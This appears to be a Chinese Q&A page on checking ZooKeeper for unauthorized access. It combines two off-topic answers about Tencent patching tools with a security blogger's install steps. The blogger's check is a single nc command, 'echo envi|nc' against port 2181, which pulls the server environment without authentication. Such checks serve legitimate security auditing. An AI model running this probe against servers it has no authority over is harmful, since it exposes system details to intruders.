如何验证zookeeper是不是有未授权访问的漏洞

Posted 2023-04-18

参考技术A 点击系统上的腾讯电脑管家应用程序界面，在工具箱中，点击修复漏洞按钮
在漏洞修复界面中，展出可以安装的修复程序列表，如果简单的话，可以直接点击右侧的一键修复按钮
点击漏洞修复界面中的，已安装，就会返回已经安装的漏洞修复程序列表
点击右上方的设置按钮，进行漏洞修复设置
在设置界面中，可以设置程序的安装和修复方式，需要提醒自己，然后进行修复操作本回答被提问者采纳 参考技术B 打开腾讯只会安全页面
然后在里面找到御点终端安全系统
接着选择上方产品选项，在里面选择腾讯御点，修复漏洞

ZooKeeper 未授权访问漏洞

 

ZooKeeper 安装：

Zookeeper的默认开放端口是2181

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz

tar -zxvf zookeepre-3.4.10.tar.gz
cd zookeeper-3.4.10/
cd conf/
vi zoo.cfg
###配置单机模式
tickTime=2000    
dataDir=/tmp/zookeeper/data    
dataLogDir=/tmp/zookeeper/logs    
clientPort=2181 

bin/zkServer.sh start   //启动
#启动client连接server
bin/zkCli.sh -server localhost:2181 

漏洞验证：

执行以下命令即可远程获取该服务器的环境：

echo envi|nc 192.168.15.74 2181

直接连接：
./zkCli.sh -server ip:port

 

 

关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。

 

 

 

参考链接：

Zookeeper 安装和配置

http://coolxing.iteye.com/blog/1871009